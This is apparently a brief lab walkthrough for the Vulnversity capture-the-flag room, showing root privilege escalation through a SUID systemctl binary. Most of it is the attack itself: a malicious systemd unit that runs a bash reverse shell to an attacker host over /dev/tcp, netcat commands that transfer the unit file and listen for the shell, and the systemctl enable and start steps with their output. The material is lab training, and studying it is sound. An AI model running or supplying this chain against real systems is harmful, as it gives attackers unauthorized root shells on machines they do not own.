https://alvinsmith.gitbook.io/progressive-oscp/untitled/vulnversity-privilege-escalation
[Unit]
Description=roooooooooot
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'
[Install]
WantedBy=multi-user.target
find / -type f -maxdepth 2 -writable
or
find / -type d -maxdepth 2 -writable
nc -vl 44444 > root.service
nc -n TargetIP 44444 < root.service
nc -lvnp 9999
/bin/systemctl enable /dev/shm/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /dev/shm/root.service
Created symlink from /etc/systemd/system/root.service -> /dev/shm/root.service
/bin/systemctl start root
Cheers
https://gtfobins.github.io/gtfobins/systemctl/#suid
https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory
https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/
vulnervisity room, if you already have an open shell, just use the same ip and port for root.service as your shell, and just reconnect.